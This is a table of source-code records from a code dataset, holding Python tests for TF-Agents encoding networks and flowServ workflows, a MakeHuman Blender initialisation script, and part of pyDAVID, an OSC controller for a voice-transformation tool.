| hexsha (string, len 40) | size (int64, 4 - 1.02M) | ext (string, 8 classes) | lang (string, 1 class) | max_stars_repo_path (string, len 4 - 209) | max_stars_repo_name (string, len 5 - 121) | max_stars_repo_head_hexsha (string, len 40) | max_stars_repo_licenses (list, len 1 - 10) | max_stars_count (int64, 1 - 191k, nullable) | max_stars_repo_stars_event_min_datetime (string, len 24, nullable) | max_stars_repo_stars_event_max_datetime (string, len 24, nullable) | max_issues_repo_path (string, len 4 - 209) | max_issues_repo_name (string, len 5 - 121) | max_issues_repo_head_hexsha (string, len 40) | max_issues_repo_licenses (list, len 1 - 10) | max_issues_count (int64, 1 - 67k, nullable) | max_issues_repo_issues_event_min_datetime (string, len 24, nullable) | max_issues_repo_issues_event_max_datetime (string, len 24, nullable) | max_forks_repo_path (string, len 4 - 209) | max_forks_repo_name (string, len 5 - 121) | max_forks_repo_head_hexsha (string, len 40) | max_forks_repo_licenses (list, len 1 - 10) | max_forks_count (int64, 1 - 105k, nullable) | max_forks_repo_forks_event_min_datetime (string, len 24, nullable) | max_forks_repo_forks_event_max_datetime (string, len 24, nullable) | content (string, len 4 - 1.02M) | avg_line_length (float64, 1.07 - 66.1k) | max_line_length (int64, 4 - 266k) | alphanum_fraction (float64, 0.01 - 1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| e66f37c5353f8e0677fe17d966a7b79b068df462 | 14,998 | py | Python | tf_agents/networks/encoding_network_test.py | niklasnolte/agents | 065b801adf4d6be7beed64f3b07397bca3c741d2 | ["Apache-2.0"] | 16 | 2020-09-23T06:21:49.000Z | 2022-03-28T05:45:04.000Z | tf_agents/networks/encoding_network_test.py | MarioBonse/agents | c727141f67051b86d2564c4bd5fbc080623bfe19 | ["Apache-2.0"] | null | null | null | tf_agents/networks/encoding_network_test.py | MarioBonse/agents | c727141f67051b86d2564c4bd5fbc080623bfe19 | ["Apache-2.0"] | 6 | 2020-10-09T06:33:23.000Z | 2022-02-03T16:16:36.000Z |
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for tf_agents.networks.encoding_network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.networks import encoding_network
from tf_agents.networks import sequential_layer
from tf_agents.specs import tensor_spec
from tf_agents.utils import test_utils
class EncodingNetworkTest(test_utils.TestCase, parameterized.TestCase):
def test_empty_layers(self):
input_spec = tensor_spec.TensorSpec((2, 3), tf.float32)
network = encoding_network.EncodingNetwork(input_spec,)
with self.assertRaises(ValueError):
network.variables # pylint: disable=pointless-statement
# Only one layer to flatten input.
self.assertLen(network.layers, 1)
config = network.layers[0].get_config()
self.assertEqual('flatten', config['name'])
out, _ = network(tf.ones((1, 2, 3)))
self.assertAllEqual(out, [[1, 1, 1, 1, 1, 1]])
self.assertEmpty(network.variables)
def test_non_preprocessing_layers_2d(self):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
fc_layer_params=(10, 5, 2),
activation_fn=tf.keras.activations.tanh,
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 10)
self.assertLen(network.layers, 6)
# Validate first conv layer.
config = network.layers[0].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2, 2), config['kernel_size'])
self.assertEqual(16, config['filters'])
self.assertEqual((1, 1), config['strides'])
self.assertTrue(config['trainable'])
# Validate second conv layer.
config = network.layers[1].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2, 2), config['kernel_size'])
self.assertEqual(15, config['filters'])
self.assertEqual((1, 1), config['strides'])
self.assertTrue(config['trainable'])
# Validate flatten layer.
config = network.layers[2].get_config()
self.assertEqual('flatten', config['name'])
# Validate dense layers.
self.assertEqual(10, network.layers[3].get_config()['units'])
self.assertEqual(5, network.layers[4].get_config()['units'])
self.assertEqual(2, network.layers[5].get_config()['units'])
def test_non_preprocessing_layers_1d(self):
input_spec = tensor_spec.TensorSpec((32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
fc_layer_params=(10, 5, 2),
activation_fn=tf.keras.activations.tanh,
conv_type='1d',
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 10)
self.assertLen(network.layers, 6)
# Validate first conv layer.
config = network.layers[0].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2,), config['kernel_size'])
self.assertEqual(16, config['filters'])
self.assertEqual((1,), config['strides'])
self.assertTrue(config['trainable'])
# Validate second conv layer.
config = network.layers[1].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2,), config['kernel_size'])
self.assertEqual(15, config['filters'])
self.assertEqual((1,), config['strides'])
self.assertTrue(config['trainable'])
def test_conv_raise_error(self):
input_spec = tensor_spec.TensorSpec((32, 3), tf.float32)
with self.assertRaises(ValueError):
_ = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
fc_layer_params=(10, 5, 2),
activation_fn=tf.keras.activations.tanh,
conv_type='3d')
def test_conv_dilation_params(self):
with self.subTest(name='no dilations'):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 4)
self.assertLen(network.layers, 3)
# Validate dilation rates
config = network.layers[0].get_config()
self.assertEqual((1, 1), config['dilation_rate'])
config = network.layers[1].get_config()
self.assertEqual((1, 1), config['dilation_rate'])
with self.subTest(name='dilations'):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1, 2), (15, 2, 1, (2, 4))),
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 4)
self.assertLen(network.layers, 3)
# Validate dilation rates
config = network.layers[0].get_config()
self.assertEqual((2, 2), config['dilation_rate'])
config = network.layers[1].get_config()
self.assertEqual((2, 4), config['dilation_rate'])
with self.subTest(name='failing conv spec'):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
with self.assertRaises(ValueError):
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1, 2, 4), (15, 2, 1)),
)
with self.assertRaises(ValueError):
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2)),
)
def test_preprocessing_layer_no_combiner(self):
network = encoding_network.EncodingNetwork(
input_tensor_spec=tensor_spec.TensorSpec([5], tf.float32),
preprocessing_layers=tf.keras.layers.Lambda(lambda x: x),
preprocessing_combiner=None,
fc_layer_params=(2,))
out, _ = network(tf.ones((3, 5)))
self.assertAllEqual(out.shape.as_list(), [3, 2])
def test_preprocessing_layers_no_combiner_error(self):
with self.assertRaisesRegex(ValueError, 'required'):
encoding_network.EncodingNetwork(
input_tensor_spec=[
tensor_spec.TensorSpec([5], tf.float32),
tensor_spec.TensorSpec([5], tf.float32)
],
preprocessing_layers=[
tf.keras.layers.Lambda(lambda x: x),
tf.keras.layers.Lambda(lambda x: x)
],
preprocessing_combiner=None,
fc_layer_params=(2,))
def test_error_raised_if_missing_preprocessing_layer(self):
with self.assertRaisesRegex(ValueError, 'sequence length'):
encoding_network.EncodingNetwork(
input_tensor_spec=[
tensor_spec.TensorSpec([5], tf.float32),
tensor_spec.TensorSpec([5], tf.float32)
],
preprocessing_layers=[
tf.keras.layers.Lambda(lambda x: x),
],
preprocessing_combiner=None,
fc_layer_params=(2,))
def test_error_raised_extra_preprocessing_layer(self):
with self.assertRaisesRegex(ValueError, 'sequence length'):
encoding_network.EncodingNetwork(
input_tensor_spec=tensor_spec.TensorSpec([5], tf.float32),
preprocessing_layers=[
tf.keras.layers.Lambda(lambda x: x),
tf.keras.layers.Lambda(lambda x: x)
],
preprocessing_combiner=None,
fc_layer_params=(2,))
def test_dict_spec_and_pre_processing(self):
input_spec = {
'a': tensor_spec.TensorSpec((32, 32, 3), tf.float32),
'b': tensor_spec.TensorSpec((32, 32, 3), tf.float32)
}
network = encoding_network.EncodingNetwork(
input_spec,
preprocessing_layers={
'a':
sequential_layer.SequentialLayer([
tf.keras.layers.Dense(4, activation='tanh'),
tf.keras.layers.Flatten()
]),
'b':
tf.keras.layers.Flatten()
},
fc_layer_params=(),
preprocessing_combiner=tf.keras.layers.Concatenate(axis=-1),
activation_fn=tf.keras.activations.tanh,
)
sample_input = tensor_spec.sample_spec_nest(input_spec)
output, _ = network(sample_input)
    # 7168 = 4096 (flattened Dense(4) output for 'a') + 3072 (flattened (32, 32, 3) for 'b').
self.assertEqual((7168,), output.shape)
def test_layers_buildable(self):
input_spec = {
'a': tensor_spec.TensorSpec((32, 32, 3), tf.float32),
'b': tensor_spec.TensorSpec((32, 32, 3), tf.float32)
}
network = encoding_network.EncodingNetwork(
input_spec,
preprocessing_layers={
'a':
sequential_layer.SequentialLayer([
tf.keras.layers.Dense(4, activation='tanh'),
tf.keras.layers.Flatten()
]),
'b':
tf.keras.layers.Flatten()
},
fc_layer_params=(),
preprocessing_combiner=tf.keras.layers.Concatenate(axis=-1),
activation_fn=tf.keras.activations.tanh,
)
network.create_variables()
self.assertNotEmpty(network.variables)
def testDenseFeaturesV1RaisesError(self):
key = 'feature_key'
state_dims = 5
column = tf.feature_column.numeric_column(key, [state_dims])
input_spec = {key: tensor_spec.TensorSpec([state_dims], tf.int32)}
dense_features = tf.compat.v1.keras.layers.DenseFeatures([column])
with self.assertRaisesRegex(ValueError, 'DenseFeatures'):
encoding_network.EncodingNetwork(
input_spec, preprocessing_combiner=dense_features)
def testNumericFeatureColumnInput(self):
key = 'feature_key'
batch_size = 3
state_dims = 5
input_shape = (batch_size, state_dims)
column = tf.feature_column.numeric_column(key, [state_dims])
state = {key: tf.ones(input_shape, tf.int32)}
input_spec = {key: tensor_spec.TensorSpec([state_dims], tf.int32)}
dense_features = tf.compat.v2.keras.layers.DenseFeatures([column])
network = encoding_network.EncodingNetwork(
input_spec, preprocessing_combiner=dense_features)
output, _ = network(state)
self.assertEqual(input_shape, output.shape)
def testIndicatorFeatureColumnInput(self):
key = 'feature_key'
vocab_list = [2, 3, 4]
column = tf.feature_column.categorical_column_with_vocabulary_list(
key, vocab_list)
column = tf.feature_column.indicator_column(column)
state_input = [3, 2, 2, 4, 3]
state = {key: tf.expand_dims(state_input, -1)}
input_spec = {key: tensor_spec.TensorSpec([1], tf.int32)}
dense_features = tf.compat.v2.keras.layers.DenseFeatures([column])
network = encoding_network.EncodingNetwork(
input_spec, preprocessing_combiner=dense_features)
output, _ = network(state)
expected_shape = (len(state_input), len(vocab_list))
self.assertEqual(expected_shape, output.shape)
def testCombinedFeatureColumnInput(self):
columns = {}
tensors = {}
specs = {}
expected_dim = 0
indicator_key = 'indicator_key'
vocab_list = [2, 3, 4]
column1 = tf.feature_column.categorical_column_with_vocabulary_list(
indicator_key, vocab_list)
columns[indicator_key] = tf.feature_column.indicator_column(column1)
state_input = [3, 2, 2, 4, 3]
tensors[indicator_key] = tf.expand_dims(state_input, -1)
specs[indicator_key] = tensor_spec.TensorSpec([1], tf.int32)
expected_dim += len(vocab_list)
# TODO(b/134950354): Test embedding column for non-eager mode only for now.
if not tf.executing_eagerly():
embedding_key = 'embedding_key'
embedding_dim = 3
vocab_list = [2, 3, 4]
column2 = tf.feature_column.categorical_column_with_vocabulary_list(
embedding_key, vocab_list)
columns[embedding_key] = tf.feature_column.embedding_column(
column2, embedding_dim)
state_input = [3, 2, 2, 4, 3]
tensors[embedding_key] = tf.expand_dims(state_input, -1)
specs[embedding_key] = tensor_spec.TensorSpec([1], tf.int32)
expected_dim += embedding_dim
numeric_key = 'numeric_key'
batch_size = 5
state_dims = 3
input_shape = (batch_size, state_dims)
columns[numeric_key] = tf.feature_column.numeric_column(
numeric_key, [state_dims])
tensors[numeric_key] = tf.ones(input_shape, tf.int32)
specs[numeric_key] = tensor_spec.TensorSpec([state_dims], tf.int32)
expected_dim += state_dims
dense_features = tf.compat.v2.keras.layers.DenseFeatures(
list(columns.values()))
network = encoding_network.EncodingNetwork(
specs, preprocessing_combiner=dense_features)
output, _ = network(tensors)
expected_shape = (batch_size, expected_dim)
self.assertEqual(expected_shape, output.shape)
@parameterized.named_parameters(
('TrainingTrue', True,),
('TrainingFalse', False))
def testDropoutFCLayers(self, training):
batch_size = 3
num_obs_dims = 5
obs_spec = tensor_spec.TensorSpec([num_obs_dims], tf.float32)
network = encoding_network.EncodingNetwork(
obs_spec,
fc_layer_params=[20],
dropout_layer_params=[0.5])
obs = tf.random.uniform([batch_size, num_obs_dims])
output1, _ = network(obs, training=training)
output2, _ = network(obs, training=training)
self.evaluate(tf.compat.v1.global_variables_initializer())
output1, output2 = self.evaluate([output1, output2])
if training:
self.assertGreater(np.linalg.norm(output1 - output2), 0)
else:
self.assertAllEqual(output1, output2)
def testWeightDecay(self):
batch_size = 3
num_obs_dims = 5
obs_spec = tensor_spec.TensorSpec([num_obs_dims], tf.float32)
network = encoding_network.EncodingNetwork(
obs_spec,
fc_layer_params=[20],
weight_decay_params=[0.5])
obs = tf.random.uniform([batch_size, num_obs_dims])
network(obs)
self.evaluate(tf.compat.v1.global_variables_initializer())
regularization_loss = self.evaluate(network.losses[0])
self.assertGreater(regularization_loss, 0)
if __name__ == '__main__':
tf.test.main()
| 36.31477 | 79 | 0.672356 |
| ac994e0454cdcec0bccd27f133225df46949179b | 2,293 | py | Python | makehuman-master/makehuman/testsuite/blender_initTest.py | Radiian-Arts-Main/Radiian-Arts-BioSource | 51e08da0b3171fe96badc68780fd0f3381d49738 | ["MIT"] | 1 | 2022-03-12T03:52:55.000Z | 2022-03-12T03:52:55.000Z | makehuman-master/makehuman/testsuite/blender_initTest.py | Phantori/Radiian-Arts-BioSource | 51e08da0b3171fe96badc68780fd0f3381d49738 | ["MIT"] | null | null | null | makehuman-master/makehuman/testsuite/blender_initTest.py | Phantori/Radiian-Arts-BioSource | 51e08da0b3171fe96badc68780fd0f3381d49738 | ["MIT"] | 3 | 2020-05-10T16:11:23.000Z | 2021-05-30T02:11:28.000Z |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Blender initialize test script
**Project Name:** MakeHuman
**Product Home Page:** http://www.makehumancommunity.org/
**Github Code Home Page:** https://github.com/makehumancommunity/
**Authors:** Jonas Hauquier
**Copyright(c):** MakeHuman Team 2001-2019
**Licensing:** AGPL3
This file is part of MakeHuman Community (www.makehumancommunity.org).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Abstract
--------
Blender script (to be used within blender) that initializes test environment
"""
import bpy
def enablePlugins():
try:
bpy.ops.wm.addon_enable(module = "io_import_scene_mhx")
print("MH_TEST SUCCESS Loaded MHX importer plugin.")
except:
print("MH_TEST ERROR Could not import load MHX importer plugin. Is it installed?")
try:
bpy.ops.wm.addon_enable(module = "maketarget")
print("MH_TEST SUCCESS Loaded maketarget plugin.")
except:
print("MH_TEST ERROR Could not import load maketarget plugin. Is it installed?")
try:
bpy.ops.wm.addon_enable(module = "makewalk")
print("MH_TEST SUCCESS Loaded makewalk plugin.")
except:
print("MH_TEST ERROR Could not import load makewalk plugin. Is it installed?")
try:
bpy.ops.wm.addon_enable(module = "makeclothes")
print("MH_TEST SUCCESS Loaded makeclothes plugin.")
except:
print("MH_TEST ERROR Could not import load makeclothes plugin. Is it installed?")
def quit():
"""
Quit blender
"""
bpy.ops.wm.quit_blender()
# Enable necessary plugins
enablePlugins()
quit()
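# How this script is typically invoked (an assumption based on the docstring
# above, not stated in the file): headless Blender runs it and the MH_TEST
# lines are collected from stdout by the calling test suite, e.g.
#
#     blender --background --python blender_initTest.py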
| 28.6625 | 90 | 0.686873 |
| 3b895402c24bf76c6d4cd471b1b04db00e2f01fa | 3,673 | py | Python | tests/service/workflow/test_local_workflow_service.py | anrunw/flowserv-core-1 | 7116b7060aa68ab36bf08e6393be166dc5db955f | ["MIT"] | null | null | null | tests/service/workflow/test_local_workflow_service.py | anrunw/flowserv-core-1 | 7116b7060aa68ab36bf08e6393be166dc5db955f | ["MIT"] | null | null | null | tests/service/workflow/test_local_workflow_service.py | anrunw/flowserv-core-1 | 7116b7060aa68ab36bf08e6393be166dc5db955f | ["MIT"] | null | null | null |
# This file is part of the Reproducible and Reusable Data Analysis Workflow
# Server (flowServ).
#
# Copyright (C) 2019-2021 NYU.
#
# flowServ is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Unit tests for the local workflow service API."""
from flowserv.tests.service import create_user
import flowserv.tests.serialize as serialize
def test_delete_workflow_local(local_service, hello_world):
"""Test deleting a workflow from the repository."""
# -- Setup ----------------------------------------------------------------
#
# Create two instances of the 'Hello World' workflow.
with local_service() as api:
workflow = hello_world(api, name='W1')
workflow_id = workflow.workflow_id
hello_world(api, name='W2')
# -- Delete the first workflow --------------------------------------------
with local_service() as api:
api.workflows().delete_workflow(workflow_id)
# After deletion one workflow is left.
r = api.workflows().list_workflows()
assert len(r['workflows']) == 1
def test_get_workflow_local(local_service, hello_world):
"""Test serialization for created workflows."""
# -- Create workflow with minimal metadata --------------------------------
with local_service() as api:
user_1 = create_user(api)
workflow = hello_world(api, name='W1')
workflow_id = workflow.workflow_id
r = api.workflows().get_workflow(workflow_id)
serialize.validate_workflow_handle(doc=r)
assert len(r['parameterGroups']) == 1
serialize.validate_para_module(r['parameterGroups'][0])
assert len(r['parameters']) == 3
for para in r['parameters']:
serialize.validate_parameter(para)
with local_service(user_id=user_1) as api:
api.groups().create_group(workflow_id=workflow_id, name='G1')
r = api.workflows().get_workflow(workflow_id)
serialize.validate_workflow_handle(doc=r)
assert len(r['groups']) == 1
def test_list_workflows_local(local_service, hello_world):
"""Test serialization for workflow listings."""
# -- Setup ----------------------------------------------------------------
#
# Create two instances of the 'Hello World' workflow.
with local_service() as api:
hello_world(api, name='W1')
hello_world(api, name='W2')
# -- Workflow Listing -----------------------------------------------------
with local_service() as api:
r = api.workflows().list_workflows()
serialize.validate_workflow_listing(doc=r)
assert len(r['workflows']) == 2
def test_update_workflow_local(local_service, hello_world):
"""Test updating workflow properties."""
# -- Setup ----------------------------------------------------------------
#
    # Create one instance of the 'Hello World' workflow with minimal metadata.
with local_service() as api:
workflow = hello_world(api, name='W1')
workflow_id = workflow.workflow_id
r = api.workflows().get_workflow(workflow_id)
assert 'description' not in r
assert 'instructions' not in r
# -- Update workflow ------------------------------------------------------
with local_service() as api:
r = api.workflows().update_workflow(
workflow_id=workflow_id,
name='Hello World',
description='Simple Hello World Demo',
instructions='Just run it'
)
assert r['name'] == 'Hello World'
assert r['description'] == 'Simple Hello World Demo'
assert r['instructions'] == 'Just run it'
| 40.362637 | 79 | 0.598965 |
| 57d00912979fec21a20bb7538394dba7abc8aca5 | 11,760 | py | Python | pydavid/pydavid.py | Pablo-Arias/STIM | 4f9594c32003bc29268226b7766cc160655f7000 | ["MIT"] | 2 | 2018-02-12T14:31:14.000Z | 2020-02-27T22:53:05.000Z | pydavid/pydavid.py | Pablo-Arias/STIM | 4f9594c32003bc29268226b7766cc160655f7000 | ["MIT"] | null | null | null | pydavid/pydavid.py | Pablo-Arias/STIM | 4f9594c32003bc29268226b7766cc160655f7000 | ["MIT"] | 1 | 2018-09-27T10:11:25.000Z | 2018-09-27T10:11:25.000Z |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 16:57:12 2018
@author: leehooni
"""
from __future__ import absolute_import
from __future__ import print_function
import threading
from pyosc import OSC
# pyDAVID
#
class pydavid():
address = []
global user_callback
def user_callback(path, tags, args, source):
# which user will be determined by path:
# we just throw away all slashes and join together what's left
user = ''.join(path.split("/"))
# tags will contain 'fff'
# args is a OSCMessage with data
# source is where the message came from (in case you need to reply)
print(("Now do something with", user,args[2],args[0],1-args[1]))
def __init__(self,address):
self.address = address
self.client = OSC.OSCClient()
self.server = OSC.OSCServer((address, 5681))
self.server.addDefaultHandlers()
self.server.addMsgHandler( "/user/1", user_callback )
self.server.addMsgHandler( "/user/2", user_callback )
self.server.addMsgHandler( "/user/3", user_callback )
self.server.addMsgHandler( "/user/4", user_callback )
server = self.server
self.servert = threading.Thread(target=server.serve_forever)
def connect(self):
self.client.connect((self.address, 5678))
print('Testing OSC connection...')
oscmsg = OSC.OSCMessage()
oscmsg.append('pyDAVID is connected')
oscmsg.setAddress('/print')
servert = self.servert
servert.daemon = True
servert.start()
print("Starting OSCServer. Use ctrl-C to quit.")
self.client.send(oscmsg)
print(oscmsg)
def disconnect(self):
# self.servert.exit()
# self.server.shutdown()
self.server.close()
# self.servert.join()
def ping(self):
oscmsg = OSC.OSCMessage()
oscmsg.append('ping')
oscmsg.setAddress('/ping')
self.client.send(oscmsg)
# MICROPHONE
def MicOnOff(self,value):
dbundle = OSC.OSCBundle()
        if value in (0, 1):
            dbundle.append({'addr':"/miconoff", 'args':value})
            self.client.send(dbundle)
        else:
            raise TypeError("MicOnOff : 0 or 1 expected")
def MicPreset(self,value):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/preset", 'args':value})
self.client.send(dbundle)
def MicRamp(self,preset=1, hold_time=0, ramp_time=0):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
self.client.send(dbundle)
def MicPitchShift(self, sfrecname, pitchshift=0, hold_time=0, ramp_time=0, marker_name = [], sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
if marker_name != []:
dbundle.append({'addr':"/recsync", 'args':marker_name})
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/pitch", 'args':pitchshift})
dbundle.append({'addr':"/micrecname", 'args':sfrecname})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def StoreMarkers(self, marker_filename = []):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/recsync-store", 'args':marker_filename})
self.client.send(dbundle)
def MicRecord(self, sfrecname, preset=1, hold_time=0, ramp_time=0, sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/micrecname", 'args':sfrecname})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
#dbundle.append({'addr':"/record", 'args': 1})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def StopMicRecord(self):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/preset", 'args':1})
dbundle.append({'addr':"/automation", 'args':[0,0,0]})
dbundle.append({'addr':"/stoprecord", 'args': [0]})
self.client.send(dbundle)
# SOUND FILE
def SfPlay(self,sfplayname = [] ):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/sfplay", 'args':1})
self.client.send(dbundle)
def SfPreset(self,sfplayname,value):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/preset", 'args':value})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/sfplay", 'args':1})
self.client.send(dbundle)
def SfRamp(self,sfplayname,preset=1, hold_time=0, ramp_time=0):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/sfplay", 'args':1})
self.client.send(dbundle)
def SfRecord(self,sfplayname, preset=1, hold_time=0, ramp_time=0, sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sfrec", 'args':0})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
#dbundle.append({'addr':"/record", 'args': 1})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
else:
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def SfPitchShiftRecord(self,sfplayname,pitchshift=0, hold_time=0, ramp_time=0, marker_name = [], sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
if marker_name != []:
dbundle.append({'addr':"/recsync", 'args':marker_name})
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sfrec", 'args':0})
dbundle.append({'addr':"/pitch", 'args':pitchshift})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
#dbundle.append({'addr':"/record", 'args':1})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
else:
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def SfRecIter(self,sffoldername, sfolderrecname, preset=1, hold_time=0, ramp_time=0):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sffoldername", 'args':sffoldername})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
# SMILE
def sound_duration(self, soundfile):
""" DURATION OF ANY WAV FILE
Input : path of a wav file (string)
Returns : duration in seconds (float) """
import wave
self.soundfile = soundfile
self.audio = wave.open(self.soundfile)
self.sr = self.audio.getframerate() # Sample rate [Hz]
self.N = self.audio.getnframes() # Number of frames (int)
self.duration = round(float(self.N)/float(self.sr),2) # Duration (float) [s]
return self.duration
def get_file_list(self, file_path):
""" GET LIST OF FILE NAMES WITHOUT EXTENSION
Input : target folder path (string)
Returns : file name strings without extension (list) """
import os
self.file_path = file_path
self.file_list = os.listdir(self.file_path)
if '.DS_Store' in self.file_list: self.file_list.remove('.DS_Store') # for Mac users
# Remove item in list if it is a directory and remove extension
self.file_list_names = []
for self.file_item in self.file_list:
if os.path.isdir(os.path.join(self.file_path, self.file_item)):
self.file_list.remove(self.file_item)
self.file_item, _ = self.file_item.split('.')
self.file_list_names.append(self.file_item)
return self.file_list_names
def ZiggyControl(self, alpha = 1, harm = 0.3, winsize = 1, anawinsize = 1, sfopenpath = '', sfrecname = 'pyDAVID_ziggy', sfplaylistnum = 1, sfrecpath='', warp_freq=[0,0,10000,10000]):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/smile", 'args': ["/alpha", alpha ]})
dbundle.append({'addr':"/smile", 'args': ["/harm", harm ]})
dbundle.append({'addr':"/smile", 'args': ["/winsize", winsize ]})
dbundle.append({'addr':"/smile", 'args': ["/anawinsize", anawinsize ]})
dbundle.append({'addr':"/smile", 'args': ["/sfplaylistnum", sfplaylistnum ]})
dbundle.append({'addr':"/smile", 'args': ["/sfrecname", sfrecname ]})
dbundle.append({'addr':"/smile", 'args': ["/warp_freq", warp_freq ]})
if sfopenpath!='':
dbundle.append({'addr':"/smile", 'args': ["/sfopenpath", sfopenpath ]})
if sfrecpath!='':
dbundle.append({'addr':"/smile", 'args': ["/sfrecpath", sfrecpath ]})
self.client.send(dbundle)
def ZiggyPhoneControl(self, instance=3, alpha = 1, harm = 0.3, winsize = 1, anawinsize = 1, sfopenpath = '', sfrecname = 'pyDAVID_ziggy', sfplaylistnum = 1, sfrecpath=''):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/smile", 'args': ["/inst", instance ]})
dbundle.append({'addr':"/smile", 'args': ["/alpha", alpha ]})
dbundle.append({'addr':"/smile", 'args': ["/harm", harm ]})
dbundle.append({'addr':"/smile", 'args': ["/winsize", winsize ]})
# dbundle.append({'addr':"/smile", 'args': ["/anawinsize", anawinsize ]})
# dbundle.append({'addr':"/smile", 'args': ["/sfplaylistnum", sfplaylistnum ]})
# dbundle.append({'addr':"/smile", 'args': ["/sfrecname", sfrecname ]})
# if sfopenpath!='':
